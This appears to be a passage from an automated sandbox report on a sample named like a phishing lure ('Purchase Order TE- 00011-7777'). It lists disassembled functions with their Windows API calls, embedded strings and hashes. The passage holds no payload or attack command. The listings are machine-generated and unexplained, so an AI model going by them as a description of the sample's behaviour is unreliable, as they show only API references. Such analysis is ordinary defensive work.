                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ACFA6A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                      • String ID:
                      • API String ID: 3869813825-0
                      • Opcode ID: ca6ca7662a90795d559de9023aaa675556293c97bbc9086194aee3ea7982c1f5
                      • Instruction ID: 82aa27193ca3c00b9cd75bb4ef3a3c53ae4367e95e95ba6334807de2374af954
                      • Opcode Fuzzy Hash: ca6ca7662a90795d559de9023aaa675556293c97bbc9086194aee3ea7982c1f5
                      • Instruction Fuzzy Hash: 4F513B71900709AFDB209FA8CD89FAEBBF6FF04705F11492DE596A35A0CB74A944CB50
                      Function 00AFCC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AFCD0B
                      • DestroyWindow.USER32(?,?), ref: 00AFCD83
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AFCE04
                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AFCE26
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AFCE35
                      • DestroyWindow.USER32(?), ref: 00AFCE52
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A90000,00000000), ref: 00AFCE85
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AFCEA4
                      • GetDesktopWindow.USER32 ref: 00AFCEB9
                      • GetWindowRect.USER32(00000000), ref: 00AFCEC0
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AFCED2
                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AFCEEA
                        • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                      • String ID: 0$tooltips_class32
                      • API String ID: 1297703922-3619404913
                      • Opcode ID: 978ce9f4a16324f7831576add9220acd4b09497cdceb40582c143c0a18a14dbf
                      • Instruction ID: 71eefcb40c353b8467b77c2edbab66c1f60b8591fc3ccdeb49b4d7f875d1f46a
                      • Opcode Fuzzy Hash: 978ce9f4a16324f7831576add9220acd4b09497cdceb40582c143c0a18a14dbf
                      • Instruction Fuzzy Hash: 6F719A71240309AFEB25CF68CD45FBA3BE5EB89714F440918FA85972A1DB70E801CB21
                      Function 00AFF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • DragQueryPoint.SHELL32(?,?), ref: 00AFF14B
                        • Part of subcall function 00AFD5EE: ClientToScreen.USER32(?,?), ref: 00AFD617
                        • Part of subcall function 00AFD5EE: GetWindowRect.USER32(?,?), ref: 00AFD68D
                        • Part of subcall function 00AFD5EE: PtInRect.USER32(?,?,00AFEB2C), ref: 00AFD69D
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AFF1B4
                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AFF1BF
                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AFF1E2
                      • _wcscat.LIBCMT ref: 00AFF212
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AFF229
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AFF242
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00AFF259
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00AFF27B
                      • DragFinish.SHELL32(?), ref: 00AFF282
                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00AFF36D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                      • API String ID: 169749273-3440237614
                      • Opcode ID: 011b10516e8618e531c5514dcc4af96def402f65bed38c40ca18e1c0a955d59d
                      • Instruction ID: d78bf51c9399d6ef3c4be4a4bf73ae04dcdacf362162abf56d21f7785af990d7
                      • Opcode Fuzzy Hash: 011b10516e8618e531c5514dcc4af96def402f65bed38c40ca18e1c0a955d59d
                      • Instruction Fuzzy Hash: D9616772508304AFC700EF64DD85EABBBF8FF89750F404A19F695971A1DB709A05CB52
                      Function 00ADB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 00ADB46D
                      • VariantCopy.OLEAUT32(?,?), ref: 00ADB476
                      • VariantClear.OLEAUT32(?), ref: 00ADB482
                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00ADB561
                      • __swprintf.LIBCMT ref: 00ADB591
                      • VarR8FromDec.OLEAUT32(?,?), ref: 00ADB5BD
                      • VariantInit.OLEAUT32(?), ref: 00ADB63F
                      • SysFreeString.OLEAUT32(00000016), ref: 00ADB6D1
                      • VariantClear.OLEAUT32(?), ref: 00ADB727
                      • VariantClear.OLEAUT32(?), ref: 00ADB736
                      • VariantInit.OLEAUT32(00000000), ref: 00ADB772
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                      • API String ID: 3730832054-3931177956
                      • Opcode ID: c796388d4603730e4578b16733fd01990004245a4d29e9e3577167ed25308fd9
                      • Instruction ID: e3fc15980148d596eaab990273f726f4943547c635639ccd21e9bb2e87272741
                      • Opcode Fuzzy Hash: c796388d4603730e4578b16733fd01990004245a4d29e9e3577167ed25308fd9
                      • Instruction Fuzzy Hash: 73C1ECB1A10615EBCF10DF65D894BAAB7B4FF05300F26846AE4069B792DB34ED40DBB1
                      Function 00AF6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00AF6FF9
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF7044
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                      • API String ID: 3974292440-4258414348
                      • Opcode ID: bcb91a707ed0ce6001cc215ba4986c2aa75c0175ff485c9e8ff368839265acd3
                      • Instruction ID: a67f422f4de09796f848a48bc58fd91d0ad589512849d7b52b8b312a8f390efd
                      • Opcode Fuzzy Hash: bcb91a707ed0ce6001cc215ba4986c2aa75c0175ff485c9e8ff368839265acd3
                      • Instruction Fuzzy Hash: F79191342046018FCB14EF54CA51B7EB7E1AF89350F04886DF9965B3A2CB35ED4ACB81
                      Function 00AFE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AFE3BB
                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AFBCBF), ref: 00AFE417
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE457
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE49C
                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AFE4D3
                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00AFBCBF), ref: 00AFE4DF
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AFE4EF
                      • DestroyIcon.USER32(?,?,?,?,?,00AFBCBF), ref: 00AFE4FE
                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AFE51B
                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AFE527
                        • Part of subcall function 00AB1BC7: __wcsicmp_l.LIBCMT ref: 00AB1C50
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                      • String ID: .dll$.exe$.icl
                      • API String ID: 1212759294-1154884017
                      • Opcode ID: 09a99dc9c41f46051406ee54dec6ac8c315dcffaedda6bdf0dd98f87ccb8e723
                      • Instruction ID: 67526bd13c645ae9e7bffd757e9dff0c7ace6b74c58318e53f89f44a8ecfa6d1
                      • Opcode Fuzzy Hash: 09a99dc9c41f46051406ee54dec6ac8c315dcffaedda6bdf0dd98f87ccb8e723
                      • Instruction Fuzzy Hash: 9C61CF71600219BEEB14DFA4CD46FFA7BACBB08711F108209FA11EB0E1DB759990D7A0
                      Function 00AE0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetLocalTime.KERNEL32(?), ref: 00AE0EFF
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AE0F0F
                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AE0F1B
                      • __wsplitpath.LIBCMT ref: 00AE0F79
                      • _wcscat.LIBCMT ref: 00AE0F91
                      • _wcscat.LIBCMT ref: 00AE0FA3
                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE0FB8
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0FCC
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0FFE
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE101F
                      • _wcscpy.LIBCMT ref: 00AE102B
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AE106A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                      • String ID: *.*
                      • API String ID: 3566783562-438819550
                      • Opcode ID: 28642ce237074079f065032a1bd0084599a2d11cfe58b5ea81d647af6f36465f
                      • Instruction ID: acf1b8b9f7d6aeec39ca60ca762daa4e1889a29ab4610caebdc88708c598a447
                      • Opcode Fuzzy Hash: 28642ce237074079f065032a1bd0084599a2d11cfe58b5ea81d647af6f36465f
                      • Instruction Fuzzy Hash: F8618F725043459FCB10EF64C944E9EB3E8FF89310F04892EF99987251EB35EA45CB92
                      Function 00ADDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • CharLowerBuffW.USER32(?,?), ref: 00ADDB26
                      • GetDriveTypeW.KERNEL32 ref: 00ADDB73
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDBBB
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDBF2
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ADDC20
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                      • API String ID: 2698844021-4113822522
                      • Opcode ID: aae1e751ae957a8640a9ab35938d121c5165a3f1b136a2f8bb26f447636ab42f
                      • Instruction ID: c210a0adeb4967e5beab56bcb185184c80f0c8c08ffd679067fde08ff64a9d3e
                      • Opcode Fuzzy Hash: aae1e751ae957a8640a9ab35938d121c5165a3f1b136a2f8bb26f447636ab42f
                      • Instruction Fuzzy Hash: 7D518D716043059FCB00EF24CA9196AB7F5FF88758F04886DF896972A1DB31EE05CB92
                      Function 00AD3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B04085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00AD3145
                      • LoadStringW.USER32(00000000,?,00B04085,00000016), ref: 00AD314E
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00B04085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00AD3170
                      • LoadStringW.USER32(00000000,?,00B04085,00000016), ref: 00AD3173
                      • __swprintf.LIBCMT ref: 00AD31B3
                      • __swprintf.LIBCMT ref: 00AD31C5
                      • _wprintf.LIBCMT ref: 00AD326C
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AD3283
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                      • API String ID: 984253442-2268648507
                      • Opcode ID: ed528bf4a41879a7098b32f5208ce2ff0bbde968bf8d588e2796235476b174cb
                      • Instruction ID: 95922045410f1b27c8331793e2273264d7ad9a209b1087b49ad949333ef060e1
                      • Opcode Fuzzy Hash: ed528bf4a41879a7098b32f5208ce2ff0bbde968bf8d588e2796235476b174cb
                      • Instruction Fuzzy Hash: 7D412472A00219BACF15FBA0DE57EEEB7F9AF14741F500066F206B20A2DE655F04CB61
                      Function 00ADD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                      Download Yara Rule
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00ADD96C
                      • __swprintf.LIBCMT ref: 00ADD98E
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00ADD9CB
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00ADD9F0
                      • _memset.LIBCMT ref: 00ADDA0F
                      • _wcsncpy.LIBCMT ref: 00ADDA4B
                      • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00ADDA80
                      • CloseHandle.KERNEL32(00000000), ref: 00ADDA8B
                      • RemoveDirectoryW.KERNEL32(?), ref: 00ADDA94
                      • CloseHandle.KERNEL32(00000000), ref: 00ADDA9E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                      • String ID: :$\$\??\%s
                      • API String ID: 2733774712-3457252023
                      • Opcode ID: 2d8d07855970e500b8907523a2d13af058b48925ce376698af84d0abcfd7d2af
                      • Instruction ID: af9259100fc36a6068257811f50b401f3abee1ab8e1ec01d572d739fb5b06f9a
                      • Opcode Fuzzy Hash: 2d8d07855970e500b8907523a2d13af058b48925ce376698af84d0abcfd7d2af
                      • Instruction Fuzzy Hash: 0F31A472600208AADB20DFA4DC49FDA77FCBF88700F50C1A6F519D6161EB709B458BA1
                      Function 00AFE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AFBD04,?,?), ref: 00AFE564
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE57B
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE586
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE593
                      • GlobalLock.KERNEL32(00000000), ref: 00AFE59C
                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5AB
                      • GlobalUnlock.KERNEL32(00000000), ref: 00AFE5B4
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5BB
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AFBD04,?,?,00000000,?), ref: 00AFE5CC
                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B1D9BC,?), ref: 00AFE5E5
                      • GlobalFree.KERNEL32(00000000), ref: 00AFE5F5
                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00AFE619
                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00AFE644
                      • DeleteObject.GDI32(00000000), ref: 00AFE66C
                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AFE682
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                      • String ID:
                      • API String ID: 3840717409-0
                      • Opcode ID: f9ac7638269fc2ad2418e25a84e1c0777ccfb3f3f40489c57a73a728649b126e
                      • Instruction ID: 8800c8267b0e7864ed6f56776fb721723212e5f4b4d4ecfd74be3e2562613d74
                      • Opcode Fuzzy Hash: f9ac7638269fc2ad2418e25a84e1c0777ccfb3f3f40489c57a73a728649b126e
                      • Instruction Fuzzy Hash: 77413A75600208BFDB11DFA5DC88EAEBBB9EF89715F508058FA06E7260DB319D41DB60
                      Function 00AE0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                      Download Yara Rule
                      APIs
                      • __wsplitpath.LIBCMT ref: 00AE0C93
                      • _wcscat.LIBCMT ref: 00AE0CAB
                      • _wcscat.LIBCMT ref: 00AE0CBD
                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AE0CD2
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0CE6
                      • GetFileAttributesW.KERNEL32(?), ref: 00AE0CFE
                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00AE0D18
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE0D2A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                      • String ID: *.*
                      • API String ID: 34673085-438819550
                      • Opcode ID: 2ce7d9d257f3240cb5d74ef94b1e10625504ea5844f0f4356844da8c0c52b720
                      • Instruction ID: 38d6fe7f6ab3179d245c23a61f6a4eaf0c849b165e08ca1b862660ffd36bfb2b
                      • Opcode Fuzzy Hash: 2ce7d9d257f3240cb5d74ef94b1e10625504ea5844f0f4356844da8c0c52b720
                      • Instruction Fuzzy Hash: 858193715043859FC764DF65C984EAAB7E8BB88310F24892AF885C7251EB74DDC4CB92
                      Function 00AFECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AFED0C
                      • GetFocus.USER32 ref: 00AFED1C
                      • GetDlgCtrlID.USER32(00000000), ref: 00AFED27
                      • _memset.LIBCMT ref: 00AFEE52
                      • GetMenuItemInfoW.USER32 ref: 00AFEE7D
                      • GetMenuItemCount.USER32(00000000), ref: 00AFEE9D
                      • GetMenuItemID.USER32(?,00000000), ref: 00AFEEB0
                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00AFEEE4
                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00AFEF2C
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AFEF64
                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00AFEF99
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
